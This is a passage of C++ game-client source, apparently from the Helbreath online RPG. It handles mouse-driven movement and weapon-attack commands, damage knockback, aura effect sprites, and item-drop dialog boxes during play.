									if ((absX <= 2) && (absY <= 2) && (m_iSuperAttackLeft > 0) && (m_bSuperAttackMode == TRUE)) {
										if ((absX <= 1) && (absY <= 1) && (m_bShiftPressed || m_bRunningMode) && (m_iSP > 0))
											m_cCommand = DEF_OBJECTATTACKMOVE;
										else m_cCommand = DEF_OBJECTATTACK;
										m_sCommX = m_sMCX;
										m_sCommY = m_sMCY;
										wType = _iGetAttackType();
									}
									else {
										if ((m_bShiftPressed || m_bRunningMode) && (m_iSP > 0) &&
											(m_sPlayerType >= 1) && (m_sPlayerType <= 6))
											m_cCommand = DEF_OBJECTRUN;
										else m_cCommand = DEF_OBJECTMOVE;
										m_sCommX = m_sMCX;
										m_sCommY = m_sMCY;
										GetPlayerTurn();
									}
									break;
								case 21: //
									if ((absX <= 2) && (absY <= 2) && (m_iSuperAttackLeft > 0) && (m_bSuperAttackMode == TRUE)) {
										if ((absX <= 1) && (absY <= 1) && (m_bShiftPressed || m_bRunningMode) && (m_iSP > 0))
											m_cCommand = DEF_OBJECTATTACKMOVE;
										else m_cCommand = DEF_OBJECTATTACK;
										m_sCommX = m_sMCX;
										m_sCommY = m_sMCY;
										wType = _iGetAttackType();
									}
									else {
										if ((m_bShiftPressed || m_bRunningMode) && (m_iSP > 0) &&
											(m_sPlayerType >= 1) && (m_sPlayerType <= 6))
											m_cCommand = DEF_OBJECTRUN;
										else m_cCommand = DEF_OBJECTMOVE;
										m_sCommX = m_sMCX;
										m_sCommY = m_sMCY;
										GetPlayerTurn();
									}
									break;
								}
							}
							break;
						}
					}
					else {
						if ((m_bShiftPressed || m_bRunningMode) && (m_iSP > 0) &&
							(m_sPlayerType >= 1) && (m_sPlayerType <= 6))
							m_cCommand = DEF_OBJECTRUN;
						else m_cCommand = DEF_OBJECTMOVE;
						m_sCommX = m_sMCX;
						m_sCommY = m_sMCY;
						GetPlayerTurn();
					}
				}
			}
			else
			{
				if ((m_bShiftPressed || m_bRunningMode) && (m_iSP > 0) &&
					(m_sPlayerType >= 1) && (m_sPlayerType <= 6))
					m_cCommand = DEF_OBJECTRUN;
				else m_cCommand = DEF_OBJECTMOVE;
				m_sCommX = indexX;
				m_sCommY = indexY;
				GetPlayerTurn();
			}
		}
	}
	else if (cRB != 0) // Mouse Right button
	{
		m_cCommand = DEF_OBJECTSTOP;
		if (m_bIsGetPointingMode == TRUE)
		{
			m_bIsGetPointingMode = FALSE;
			AddEventList(COMMAND_PROCESSOR1, 10);
		}
		if (m_bCommandAvailable == FALSE) return;
		if (m_cCommandCount >= 6) return;

		if ((m_sMCX != 0) && (m_sMCY != 0))
		{
			absX = abs(m_sPlayerX - m_sMCX);
			absY = abs(m_sPlayerY - m_sMCY);
			if (absX == 0 && absY == 0) return;

			if (m_bCtrlPressed == TRUE)
			{
				m_pMapData->bGetOwner(m_sMCX, m_sMCY, cName, &sObjectType, &iObjectStatus, &m_wCommObjectID);
				if ((iObjectStatus & 0x10) != 0) return;
				if ((sObjectType == 15) || (sObjectType == 20) || (sObjectType == 24)) return;

				if ((absX <= 1) && (absY <= 1))
				{
					wType = _iGetAttackType();
					m_cCommand = DEF_OBJECTATTACK;
					m_sCommX = m_sMCX;
					m_sCommY = m_sMCY;
				}
				else if ((absX <= 2) && (absY <= 2) // strike on Big mobs & gate from a range
					&& ((sObjectType == 66) || (sObjectType == 73) || (sObjectType == 81) || (sObjectType == 91)))
				{
					wType = _iGetAttackType();
					m_cCommand = DEF_OBJECTATTACK;
					m_sCommX = m_sMCX;
					m_sCommY = m_sMCY;
				}
				else
				{
					switch (_iGetWeaponSkillType()) {
					case 6: // Bow
						m_cCommand = DEF_OBJECTATTACK;
						m_sCommX = m_sMCX;
						m_sCommY = m_sMCY;
						wType = _iGetAttackType();
						break;

					case 5: // Boxe
					case 7: // SS
						break;

					case 8: // LS
						if ((absX <= 3) && (absY <= 3) && (m_iSuperAttackLeft > 0) && (m_bSuperAttackMode == TRUE)
							&& (_iGetAttackType() != 30)) // without StormBlade by Snoopy
						{
							wType = _iGetAttackType();
							m_cCommand = DEF_OBJECTATTACK;
							m_sCommX = m_sMCX;
							m_sCommY = m_sMCY;
						}
						else if ((absX <= 5) && (absY <= 5) && (m_iSuperAttackLeft > 0) && (m_bSuperAttackMode == TRUE)
							&& (_iGetAttackType() == 30)) // with stormBlade crit by Snoopy
						{
							wType = _iGetAttackType();
							m_cCommand = DEF_OBJECTATTACK;
							m_sCommX = m_sMCX;
							m_sCommY = m_sMCY;
						}
						else if ((absX <= 3) && (absY <= 3)
							&& (_iGetAttackType() == 5)) // with stormBlade no crit by Snoopy
						{
							wType = _iGetAttackType();
							m_cCommand = DEF_OBJECTATTACK;
							m_sCommX = m_sMCX;
							m_sCommY = m_sMCY;
						}
						break;

					case 9: // Fencing
						if ((absX <= 4) && (absY <= 4) && (m_iSuperAttackLeft > 0) && (m_bSuperAttackMode == TRUE)) {
							m_cCommand = DEF_OBJECTATTACK;
							m_sCommX = m_sMCX;
							m_sCommY = m_sMCY;
							wType = _iGetAttackType();
						}
						break;

					case 10: //
						if ((absX <= 2) && (absY <= 2) && (m_iSuperAttackLeft > 0) && (m_bSuperAttackMode == TRUE)) {
							m_cCommand = DEF_OBJECTATTACK;
							m_sCommX = m_sMCX;
							m_sCommY = m_sMCY;
							wType = _iGetAttackType();
						}
						break;

					case 14: //
						if ((absX <= 2) && (absY <= 2) && (m_iSuperAttackLeft > 0) && (m_bSuperAttackMode == TRUE)) {
							m_cCommand = DEF_OBJECTATTACK;
							m_sCommX = m_sMCX;
							m_sCommY = m_sMCY;
							wType = _iGetAttackType();
						}
						break;
					case 21: //
						if ((absX <= 2) && (absY <= 2) && (m_iSuperAttackLeft > 0) && (m_bSuperAttackMode == TRUE)) {
							m_cCommand = DEF_OBJECTATTACK;
							m_sCommX = m_sMCX;
							m_sCommY = m_sMCY;
							wType = _iGetAttackType();
						}
						break;
					}
				}
			}
			else // CTRL not pressed
			{
				absX = abs(m_sPlayerX - m_sMCX);
				absY = abs(m_sPlayerY - m_sMCY);
				m_pMapData->bGetOwner(m_sMCX, m_sMCY, cName, &sObjectType, &iObjectStatus, &m_wCommObjectID);
				if (sObjectType >= 10 || ((sObjectType >= 1) && (sObjectType <= 6))) {
					switch (sObjectType) {
					case 15:
					case 19:
					case 20:
					case 24:
					case 25:
					case 26: // npcs
						break;

					default: // All "normal mobs"
						if (_iGetFOE(iObjectStatus) >= 0) break;
						if ((sObjectType >= 1) && (sObjectType <= 6)) break;
						if ((absX <= 1) && (absY <= 1))
						{
							wType = _iGetAttackType();
							m_cCommand = DEF_OBJECTATTACK;
							m_sCommX = m_sMCX;
							m_sCommY = m_sMCY;
						}
						else if ((absX <= 2) && (absY <= 2) // strike on Big mobs & gate from a range
							&& ((sObjectType == 66) || (sObjectType == 73) || (sObjectType == 81) || (sObjectType == 91)))
						{
							wType = _iGetAttackType();
							m_cCommand = DEF_OBJECTATTACK;
							m_sCommX = m_sMCX;
							m_sCommY = m_sMCY;
						}
						else //
						{
							switch (_iGetWeaponSkillType()) {
							case 6: // Bow
								m_cCommand = DEF_OBJECTATTACK;
								m_sCommX = m_sMCX;
								m_sCommY = m_sMCY;
								wType = _iGetAttackType();
								break;

							case 5: // Boxe
							case 7: // SS
								break;

							case 8: // LS
								if ((absX <= 3) && (absY <= 3) && (m_iSuperAttackLeft > 0) && (m_bSuperAttackMode == TRUE)
									&& (_iGetAttackType() != 30)) // crit without StormBlade by Snoopy
								{
									wType = _iGetAttackType();
									m_cCommand = DEF_OBJECTATTACK;
									m_sCommX = m_sMCX;
									m_sCommY = m_sMCY;
								}
								else if ((absX <= 5) && (absY <= 5) && (m_iSuperAttackLeft > 0) && (m_bSuperAttackMode == TRUE)
									&& (_iGetAttackType() == 30)) // with stormBlade crit by Snoopy
								{
									wType = _iGetAttackType();
									m_cCommand = DEF_OBJECTATTACK;
									m_sCommX = m_sMCX;
									m_sCommY = m_sMCY;
								}
								else if ((absX <= 3) && (absY <= 3)
									&& (_iGetAttackType() == 5)) // with stormBlade no crit by Snoopy
								{
									wType = _iGetAttackType();
									m_cCommand = DEF_OBJECTATTACK;
									m_sCommX = m_sMCX;
									m_sCommY = m_sMCY;
								}
								break;

							case 9: // fencing
								if ((absX <= 4) && (absY <= 4) && (m_iSuperAttackLeft > 0) && (m_bSuperAttackMode == TRUE)) {
									m_cCommand = DEF_OBJECTATTACK;
									m_sCommX = m_sMCX;
									m_sCommY = m_sMCY;
									wType = _iGetAttackType();
								}
								break;

							case 10: //
								if ((absX <= 2) && (absY <= 2) && (m_iSuperAttackLeft > 0) && (m_bSuperAttackMode == TRUE)) {
									m_cCommand = DEF_OBJECTATTACK;
									m_sCommX = m_sMCX;
									m_sCommY = m_sMCY;
									wType = _iGetAttackType();
								}
								break;
							case 14: // hammer
								if ((absX <= 2) && (absY <= 2) && (m_iSuperAttackLeft > 0) && (m_bSuperAttackMode == TRUE)) {
									m_cCommand = DEF_OBJECTATTACK;
									m_sCommX = m_sMCX;
									m_sCommY = m_sMCY;
									wType = _iGetAttackType();
								}
								break;
							case 21: // wand
								if ((absX <= 2) && (absY <= 2) && (m_iSuperAttackLeft > 0) && (m_bSuperAttackMode == TRUE)) {
									m_cCommand = DEF_OBJECTATTACK;
									m_sCommX = m_sMCX;
									m_sCommY = m_sMCY;
									wType = _iGetAttackType();
								}
								break;
							}
						}
						break;
					}
				}
			}
		}
		else
		{
			cDir = m_Misc.cGetNextMoveDir(m_sPlayerX, m_sPlayerY, indexX, indexY);
			if (m_iHP <= 0) return;
			if (cDir == 0) return;
			if (m_cPlayerDir == cDir) return;
			ClearSkillUsingStatus();
			m_cPlayerDir = cDir;
			bSendCommand(MSGID_COMMAND_MOTION, DEF_OBJECTSTOP, m_cPlayerDir, NULL, NULL, NULL, NULL);

			m_pMapData->bSetOwner(m_sPlayerObjectID, m_sPlayerX, m_sPlayerY, m_sPlayerType, m_cPlayerDir,
				m_sPlayerAppr1, m_sPlayerAppr2, m_sPlayerAppr3, m_sPlayerAppr4, m_iPlayerApprColor,
				m_iPlayerStatus, m_cPlayerName,
				m_cCommand, NULL, NULL, NULL, 0,
				10);
			m_bCommandAvailable = FALSE;
			m_dwCommandTime = timeGetTime();
			return;
		}
	}

MOTION_COMMAND_PROCESS:;

	if (m_cCommand != DEF_OBJECTSTOP)
	{
		if (m_iHP <= 0) return;
		if (m_cCommandCount == 5) AddEventList(COMMAND_PROCESSOR2, 10, FALSE);
		if (m_bCommandAvailable == FALSE) return;
		if (m_cCommandCount >= 6) return;

		if ((m_sPlayerType >= 0) && (m_sPlayerType > 6))
		{
			switch (m_cCommand) {
			case DEF_OBJECTRUN:
			case DEF_OBJECTMAGIC:
			case DEF_OBJECTGETITEM:
				m_cCommand = DEF_OBJECTSTOP;
				break;
			}
		}

		ClearSkillUsingStatus();

		if (m_sDamageMove != 0)
		{
			m_cCommand = DEF_OBJECTDAMAGEMOVE;
			m_sCommX = m_sPlayerX;
			m_sCommY = m_sPlayerY;

			// mim crit fixed by kaozures tocado para ande bien by cloud :P
			if (m_bIllusionMVT == TRUE) {
				switch (m_sDamageMove) {
				case 1: m_sCommY++; break;
				case 2: m_sCommX--; m_sCommY++; break;
				case 3: m_sCommX--; break;
				case 4: m_sCommX--; m_sCommY--; break;
				case 5: m_sCommY--; break;
				case 6: m_sCommX++; m_sCommY--; break;
				case 7: m_sCommX++; break;
				case 8: m_sCommX++; m_sCommY++; break;
				}
			}
			else {
				switch (m_sDamageMove) {
				case 1: m_sCommY--; break;
				case 2: m_sCommX++; m_sCommY--; break;
				case 3: m_sCommX++; break;
				case 4: m_sCommX++; m_sCommY++; break;
				case 5: m_sCommY++; break;
				case 6: m_sCommX--; m_sCommY++; break;
				case 7: m_sCommX--; break;
				case 8: m_sCommX--; m_sCommY--; break;
				}
			}

			for (i = 1; i < DEF_MAXCHATMSGS; i++) {
				if (m_pChatMsgList[i] == NULL)
				{
					ZeroMemory(cTxt, sizeof(cTxt));
					wsprintf(cTxt, "-%dHP!", m_sDamageMoveAmount);

					int iFontType;
					if ((m_sDamageMoveAmount >= 0) && (m_sDamageMoveAmount < 300))        iFontType = 21;
					else if ((m_sDamageMoveAmount >= 300) && (m_sDamageMoveAmount < 1000)) iFontType = 22;
					else if ((m_sDamageMoveAmount >= 1000) || (m_sDamageMoveAmount < 0))    iFontType = 23;

					m_pChatMsgList[i] = new class CMsg(iFontType, cTxt, m_dwCurTime);
					m_pChatMsgList[i]->m_iObjectID = m_sPlayerObjectID;

					if (m_pMapData->bSetChatMsgOwner(m_sPlayerObjectID, -10, -10, i) == FALSE) {
						delete m_pChatMsgList[i];
						m_pChatMsgList[i] = NULL;
					}
					break;
				}
			}
			m_sDamageMove = 0;
		}

		switch (m_cCommand) {
		case DEF_OBJECTRUN:
		case DEF_OBJECTMOVE:
		case DEF_OBJECTDAMAGEMOVE: // v1.43

			if (m_bParalyze) return;
#ifdef DEF_ANTI_HACK
			if (m_bHackMoveBlocked) return;
#endif
			bGORet = m_pMapData->bGetOwner(m_sCommX, m_sCommY, pDstName, &sDstOwnerType, &iDstOwnerStatus, &m_wCommObjectID); // v1.4

			if ((m_sPlayerX == m_sCommX) && (m_sPlayerY == m_sCommY))
				m_cCommand = DEF_OBJECTSTOP;
			else if ((abs(m_sPlayerX - m_sCommX) <= 1) && (abs(m_sPlayerY - m_sCommY) <= 1) &&
				(bGORet == TRUE) && (sDstOwnerType != NULL))
				m_cCommand = DEF_OBJECTSTOP;
			else if ((abs(m_sPlayerX - m_sCommX) <= 2) && (abs(m_sPlayerY - m_sCommY) <= 2) &&
				(m_pMapData->m_tile[m_sCommX][m_sCommY].m_bIsMoveAllowed == FALSE))
				m_cCommand = DEF_OBJECTSTOP;
			else
			{
				if (m_cCommand == DEF_OBJECTMOVE)
				{
					if (m_bRunningMode || m_bShiftPressed) m_cCommand = DEF_OBJECTRUN;
				}
				if (m_cCommand == DEF_OBJECTRUN)
				{
					if ((m_bRunningMode == FALSE) && (m_bShiftPressed == FALSE)) m_cCommand = DEF_OBJECTMOVE;
					if (m_iSP < 1) m_cCommand = DEF_OBJECTMOVE;
				}

				cDir = cGetNextMoveDir(m_sPlayerX, m_sPlayerY, m_sCommX, m_sCommY, TRUE);

				// Snoopy: Illusion Movement
				if ((m_bIllusionMVT == TRUE) && (m_cCommand != DEF_OBJECTDAMAGEMOVE))
				{
					cDir = cGetNextMoveDir(m_sPlayerX, m_sPlayerY, m_sCommX, m_sCommY, TRUE, TRUE);
				}
				if (cDir != 0)
				{
					m_cPlayerDir = cDir;
					bSendCommand(MSGID_COMMAND_MOTION, m_cCommand, cDir, NULL, NULL, NULL, NULL);
					switch (cDir) {
					case 1:	m_sPlayerY--; break;
					case 2:	m_sPlayerY--; m_sPlayerX++;	break;
					case 3:	m_sPlayerX++; break;
					case 4:	m_sPlayerX++; m_sPlayerY++;	break;
					case 5:	m_sPlayerY++; break;
					case 6:	m_sPlayerX--; m_sPlayerY++;	break;
					case 7:	m_sPlayerX--; break;
					case 8:	m_sPlayerX--; m_sPlayerY--;	break;
					}
					m_pMapData->bSetOwner(m_sPlayerObjectID, m_sPlayerX, m_sPlayerY, m_sPlayerType, m_cPlayerDir,
						m_sPlayerAppr1, m_sPlayerAppr2, m_sPlayerAppr3, m_sPlayerAppr4, m_iPlayerApprColor, // v1.4
						m_iPlayerStatus, m_cPlayerName,
						m_cCommand, NULL, NULL, NULL);
					m_bCommandAvailable = FALSE;
					m_dwCommandTime = timeGetTime();
					m_iPrevMoveX = m_sPlayerX;
					m_iPrevMoveY = m_sPlayerY;
				}
			}

			if (m_cCommand == DEF_OBJECTDAMAGEMOVE)
			{
				m_bIsGetPointingMode = FALSE;
				m_iPointCommandType = -1;
				m_stMCursor.sCursorFrame = 0;
				ClearSkillUsingStatus();
				m_cCommand = DEF_OBJECTSTOP;
			}
			break;

		case DEF_OBJECTATTACK:
			cDir = m_Misc.cGetNextMoveDir(m_sPlayerX, m_sPlayerY, m_sCommX, m_sCommY);
			// Snoopy: Illusion movement
			if (m_bIllusionMVT == TRUE)
			{
				cDir += 4;
				if (cDir >8) cDir -= 8;
			}
			if (cDir != 0)
			{
				if ((wType == 2) || (wType == 25))
				{
					if (_bCheckItemByType(DEF_ITEMTYPE_ARROW) == FALSE)
						wType = 0;
				}
				if (wType >= 20)
				{
					m_iSuperAttackLeft--;
					if (m_iSuperAttackLeft < 0) m_iSuperAttackLeft = 0;
				}
				m_cPlayerDir = cDir;
				bSendCommand(MSGID_COMMAND_MOTION, DEF_OBJECTATTACK, cDir, m_sCommX, m_sCommY, wType, NULL, m_wCommObjectID);
				m_pMapData->bSetOwner(m_sPlayerObjectID, m_sPlayerX, m_sPlayerY, m_sPlayerType, m_cPlayerDir,
					m_sPlayerAppr1, m_sPlayerAppr2, m_sPlayerAppr3, m_sPlayerAppr4, m_iPlayerApprColor,
					m_iPlayerStatus, m_cPlayerName,
					DEF_OBJECTATTACK,
					m_sCommX - m_sPlayerX, m_sCommY - m_sPlayerY, wType);
				m_bCommandAvailable = FALSE;
				m_dwCommandTime = timeGetTime();
			}
			m_cCommand = DEF_OBJECTSTOP;
			break;

		case DEF_OBJECTATTACKMOVE:
			if (m_bParalyze) return;
#ifdef DEF_ANTI_HACK
			if (m_bHackMoveBlocked) return;
#endif
			bGORet = m_pMapData->bGetOwner(m_sCommX, m_sCommY, pDstName, &sDstOwnerType, &iDstOwnerStatus, &m_wCommObjectID);
			if ((m_sPlayerX == m_sCommX) && (m_sPlayerY == m_sCommY))
				m_cCommand = DEF_OBJECTSTOP;
			else if ((abs(m_sPlayerX - m_sCommX) <= 1) && (abs(m_sPlayerY - m_sCommY) <= 1) &&
				(bGORet == TRUE) && (sDstOwnerType != NULL))
				m_cCommand = DEF_OBJECTSTOP;
			else
			{
				cDir = cGetNextMoveDir(m_sPlayerX, m_sPlayerY, m_sCommX, m_sCommY, TRUE);
				// Snoopy: Illusion mvt
				if (m_bIllusionMVT == TRUE)
				{
					cDir = cGetNextMoveDir(m_sPlayerX, m_sPlayerY, m_sCommX, m_sCommY, TRUE, TRUE);
				}
				if (cDir != 0)
				{
					m_cPlayerDir = cDir;
					bSendCommand(MSGID_COMMAND_MOTION, DEF_OBJECTATTACKMOVE, cDir, m_sCommX, m_sCommY, wType, NULL, m_wCommObjectID);
					switch (cDir) {
					case 1:	m_sPlayerY--; break;
					case 2:	m_sPlayerY--; m_sPlayerX++;	break;
					case 3:	m_sPlayerX++; break;
					case 4:	m_sPlayerX++; m_sPlayerY++;	break;
					case 5:	m_sPlayerY++; break;
					case 6:	m_sPlayerX--; m_sPlayerY++;	break;
					case 7:	m_sPlayerX--; break;
					case 8:	m_sPlayerX--; m_sPlayerY--;	break;
					}

					m_pMapData->bSetOwner(m_sPlayerObjectID, m_sPlayerX, m_sPlayerY, m_sPlayerType, m_cPlayerDir,
						m_sPlayerAppr1, m_sPlayerAppr2, m_sPlayerAppr3, m_sPlayerAppr4, m_iPlayerApprColor,
						m_iPlayerStatus, m_cPlayerName,
						m_cCommand, m_sCommX - m_sPlayerX, m_sCommY - m_sPlayerY, wType);
					m_bCommandAvailable = FALSE;
					m_dwCommandTime = timeGetTime();
					m_iPrevMoveX = m_sPlayerX;
					m_iPrevMoveY = m_sPlayerY;
				}
			}
			m_cCommand = DEF_OBJECTSTOP;
			break;

		case DEF_OBJECTGETITEM:
			bSendCommand(MSGID_COMMAND_MOTION, DEF_OBJECTGETITEM, m_cPlayerDir, NULL, NULL, NULL, NULL);
			m_pMapData->bSetOwner(m_sPlayerObjectID, m_sPlayerX, m_sPlayerY, m_sPlayerType, m_cPlayerDir,
				m_sPlayerAppr1, m_sPlayerAppr2, m_sPlayerAppr3, m_sPlayerAppr4, m_iPlayerApprColor,
				m_iPlayerStatus, m_cPlayerName,
				DEF_OBJECTGETITEM, NULL, NULL, NULL);
			m_bCommandAvailable = FALSE;
			m_cCommand = DEF_OBJECTSTOP;
			break;

		case DEF_OBJECTMAGIC:
			bSendCommand(MSGID_COMMAND_MOTION, DEF_OBJECTMAGIC, m_cPlayerDir, m_iCastingMagicType, NULL, NULL, NULL);
			m_pMapData->bSetOwner(m_sPlayerObjectID, m_sPlayerX, m_sPlayerY, m_sPlayerType, m_cPlayerDir,
				m_sPlayerAppr1, m_sPlayerAppr2, m_sPlayerAppr3, m_sPlayerAppr4, m_iPlayerApprColor,
				m_iPlayerStatus, m_cPlayerName,
				DEF_OBJECTMAGIC, m_iCastingMagicType, NULL, NULL);
			m_bCommandAvailable = FALSE;
			m_dwCommandTime = timeGetTime();
			m_bIsGetPointingMode = TRUE;
			m_cCommand = DEF_OBJECTSTOP;
			_RemoveChatMsgListByObjectID(m_sPlayerObjectID);
			for (i = 1; i < DEF_MAXCHATMSGS; i++)
				if (m_pChatMsgList[i] == NULL)
				{
					ZeroMemory(cTxt, sizeof(cTxt));
					wsprintf(cTxt, "%s!", m_pMagicCfgList[m_iCastingMagicType]->m_cName);
					m_pChatMsgList[i] = new class CMsg(41, cTxt, timeGetTime());
					m_pChatMsgList[i]->m_iObjectID = m_sPlayerObjectID;
					m_pMapData->bSetChatMsgOwner(m_sPlayerObjectID, -10, -10, i);
					return;
				}
			break;

		default:
			break;
		}
	}
}

void CGame::CheckActiveAura(short sX, short sY, DWORD dwTime, short sOwnerType)
{	// Used at the beginning of character drawing
	// DefenseShield
	if ((_tmp_iStatus & 0x02000000) != 0)
		m_pEffectSpr[80]->PutTransSprite50(sX + 75, sY + 107, _tmp_iEffectFrame % 17, dwTime);

	// Protection From Magic
	if ((_tmp_iStatus & 0x04000000) != 0)
		m_pEffectSpr[79]->PutTransSprite70(sX + 101, sY + 135, _tmp_iEffectFrame % 15, dwTime);

	// Protection From Arrow
	if ((_tmp_iStatus & 0x08000000) != 0)
		m_pEffectSpr[72]->PutTransSprite70(sX, sY + 35, _tmp_iEffectFrame % 30, dwTime);

	// Illusion
	if ((_tmp_iStatus & 0x01000000) != 0)
		m_pEffectSpr[73]->PutTransSprite70(sX + 125, sY + 130 - _iAttackerHeight[sOwnerType], _tmp_iEffectFrame % 24, dwTime);

	// Illusion movement
	if ((_tmp_iStatus & 0x00200000) != 0)
		m_pEffectSpr[151]->PutTransSprite70(sX + 90, sY + 90 - _iAttackerHeight[sOwnerType], _tmp_iEffectFrame % 24, dwTime);

	// Slate red  (HP)  Flame au sol
	if ((_tmp_iStatus & 0x00400000) != 0)
		m_pEffectSpr[149]->PutTransSprite70(sX + 90, sY + 120, _tmp_iEffectFrame % 15, dwTime);

	// Slate Blue (Mana) Bleu au sol
	if ((_tmp_iStatus & 0x00800000) != 0)
		m_pEffectSpr[150]->PutTransSprite70(sX + 1, sY + 26, _tmp_iEffectFrame % 15, dwTime);

	// Slate Green (XP) Mauve au sol
	if ((_tmp_iStatus & 0x00010000) != 0)
		m_pEffectSpr[148]->PutTransSprite70(sX, sY + 32, _tmp_iEffectFrame % 23, dwTime);

	// Hero Flag (Heldenian)  Flameches d'entangle
	if ((_tmp_iStatus & 0x00020000) != 0)
		m_pEffectSpr[87]->PutTransSprite70(sX + 53, sY + 54, _tmp_iEffectFrame % 29, dwTime);
}

void CGame::CheckActiveAura2(short sX, short sY, DWORD dwTime, short sOwnerType)
{	// Poison
	if ((_tmp_iStatus & 0x80) != 0)
		m_pEffectSpr[81]->PutTransSprite70(sX + 115, sY + 120 - _iAttackerHeight[sOwnerType], _tmp_iEffectFrame % 21, dwTime);

}

void CGame::UpdateScreen_OnGame()
{
	short sVal, sDivX, sModX, sDivY, sModY, sPivotX, sPivotY, sVPXsave, sVPYsave;
	static int  iUpdateRet = -1;
	short msX, msY, msZ, absX, absY, tX, tY;
	char cLB, cRB;
	char cItemColor;
	int  i, iAmount;
	DWORD dwTime = timeGetTime();
	static DWORD dwPrevChatTime = 0;
	static int   imX = 0, imY = 0;
	//50Cent Item Description
	char cStr5[256];

	int resi;

#ifdef RES_HIGH
	resi = 120;
#else
	resi = 0;
#endif

	if (m_cGameModeCount == 0)
	{
		m_DDraw.ClearBackB4();
		m_dwCheckPingTime = m_dwFPStime = m_dwCheckConnTime = m_dwCheckSprTime = m_dwCheckChatTime = m_dwAuraTime = m_dwCheckWhoTime = dwTime;
		m_sFrameCount = 0;
		if (m_bMusicStat) StartBGM();
	}

	m_cGameModeCount++;
	if (m_cGameModeCount > 20) m_cGameModeCount = 20;
	// ----------------------------------------------------

	m_DInput.UpdateMouseState(&msX, &msY, &msZ, &cLB, &cRB);
	m_dwCurTime = timeGetTime();

	if (m_bEnterPressed == TRUE)
	{
		m_bEnterPressed = FALSE;

		if ((m_bIsDialogEnabled[7] == TRUE) && (m_stDialogBoxInfo[7].cMode == 1) && (iGetTopDialogBoxIndex() == 7)) {

			EndInputString();

			m_bEnterPressed = FALSE;
			if (strlen(m_cGuildName) == 0) return;
			if (strcmp(m_cGuildName, "NONE") != 0) {
				bSendCommand(MSGID_REQUEST_CREATENEWGUILD, DEF_MSGTYPE_CONFIRM, NULL, NULL, NULL, NULL, NULL);
				m_stDialogBoxInfo[7].cMode = 2;
				//
			}
		}

		else if ((m_bIsDialogEnabled[17] == TRUE) && (m_stDialogBoxInfo[17].cMode == 1) && (iGetTopDialogBoxIndex() == 17)) {
			// Drop Item Query

			EndInputString();

			if (m_bSkillUsingStatus == TRUE)
			{
				AddEventList(UPDATE_SCREEN_ONGAME1, 10);
				return;
			}

			if ((m_bIsDialogEnabled[20] == TRUE)
				&& ((m_stDialogBoxInfo[20].cMode == 1) || (m_stDialogBoxInfo[20].cMode == 2)))
			{
				AddEventList(UPDATE_SCREEN_ONGAME1, 10);//"You can not give or drop before the actual Item transaction."
				return;
			}

			if ((m_bIsDialogEnabled[4] == TRUE) || (m_bIsDialogEnabled[23] == TRUE) || (m_bIsDialogEnabled[26] == TRUE))
			{
				AddEventList(UPDATE_SCREEN_ONGAME1, 10);
				return;
			}

			if (strlen(m_cAmountString) == 0) return;
			iAmount = atoi(m_cAmountString);

			if ((int)(m_pItemList[m_stDialogBoxInfo[17].sView]->m_dwCount) < iAmount){
				iAmount = m_pItemList[m_stDialogBoxInfo[17].sView]->m_dwCount;
			}

			if (iAmount != 0) {
				if ((int)(m_pItemList[m_stDialogBoxInfo[17].sView]->m_dwCount) >= iAmount) {
					if (m_stDialogBoxInfo[17].sV1 != NULL) {
						absX = abs(m_stDialogBoxInfo[17].sV1 - m_sPlayerX);
						absY = abs(m_stDialogBoxInfo[17].sV2 - m_sPlayerY);

						if ((absX == 0) && (absY == 0))
							AddEventList(UPDATE_SCREEN_ONGAME5, 10);
						else if ((absX <= 8) && (absY <= 8)) {
							switch (m_stDialogBoxInfo[17].sV3) {
							case 1:
							case 2:
							case 3:
							case 4:
							case 5:
							case 6:
								EnableDialogBox(20, 1, m_stDialogBoxInfo[17].sView, m_stDialogBoxInfo[17].sV3);
								m_stDialogBoxInfo[20].sV3 = iAmount;
								m_stDialogBoxInfo[20].sV4 = m_wCommObjectID;	// v1.4
								m_stDialogBoxInfo[20].sV5 = m_stDialogBoxInfo[17].sV1;
								m_stDialogBoxInfo[20].sV6 = m_stDialogBoxInfo[17].sV2;

								tX = msX - 117;
								tY = msY - 50;
								if (tX < 0) tX = 0;
#ifdef RES_HIGH
								if ((tX + 235) > 800) tX = 800 - 235;
								if (tY < 0) tY = 0;
								if ((tY + 100) > 600) tY = 600 - 100;
#else
								if ((tX + 235) > 639) tX = 639 - 235;
								if (tY < 0) tY = 0;
								if ((tY + 100) > 479) tY = 479 - 100;
#endif
								m_stDialogBoxInfo[20].sX = tX;
								m_stDialogBoxInfo[20].sY = tY;

								ZeroMemory(m_stDialogBoxInfo[20].cStr, sizeof(m_stDialogBoxInfo[20].cStr));
								strcpy(m_stDialogBoxInfo[20].cStr, m_stDialogBoxInfo[17].cStr);
								break;

							case 20:
								EnableDialogBox(20, 3, m_stDialogBoxInfo[17].sView, m_stDialogBoxInfo[17].sV3);
								m_stDialogBoxInfo[20].sV3 = iAmount;
								m_stDialogBoxInfo[20].sV4 = m_wCommObjectID;
								m_stDialogBoxInfo[20].sV5 = m_stDialogBoxInfo[17].sV1;
								m_stDialogBoxInfo[20].sV6 = m_stDialogBoxInfo[17].sV2;

								tX = msX - 117;
								tY = msY - 50;
								if (tX < 0) tX = 0;
#ifdef RES_HIGH
								if ((tX + 235) > 800) tX = 600 - 235;
								if (tY < 0) tY = 0;
								if ((tY + 100) > 600) tY = 600 - 100;
#else
								if ((tX + 235) > 639) tX = 639 - 235;
								if (tY < 0) tY = 0;
								if ((tY + 100) > 479) tY = 479 - 100;
#endif

								m_stDialogBoxInfo[20].sX = tX;
								m_stDialogBoxInfo[20].sY = tY;

								ZeroMemory(m_stDialogBoxInfo[20].cStr, sizeof(m_stDialogBoxInfo[20].cStr));
								GetNpcName(m_stDialogBoxInfo[17].sV3, m_stDialogBoxInfo[20].cStr);
								break;

							case 15:
							case 24:
								EnableDialogBox(20, 2, m_stDialogBoxInfo[17].sView, m_stDialogBoxInfo[17].sV3);
								m_stDialogBoxInfo[20].sV3 = iAmount;
								m_stDialogBoxInfo[20].sV4 = m_wCommObjectID;

								tX = msX - 117;
								tY = msY - 50;
								if (tX < 0) tX = 0;
#ifdef RES_HIGH
								if ((tX + 235) > 800) tX = 800 - 235;
								if (tY < 0) tY = 0;
								if ((tY + 100) > 600) tY = 600 - 100;
#else
								if ((tX + 235) > 639) tX = 639 - 235;
								if (tY < 0) tY = 0;
								if ((tY + 100) > 479) tY = 479 - 100;
#endif
								m_stDialogBoxInfo[20].sX = tX;
								m_stDialogBoxInfo[20].sY = tY;

								ZeroMemory(m_stDialogBoxInfo[20].cStr, sizeof(m_stDialogBoxInfo[20].cStr));
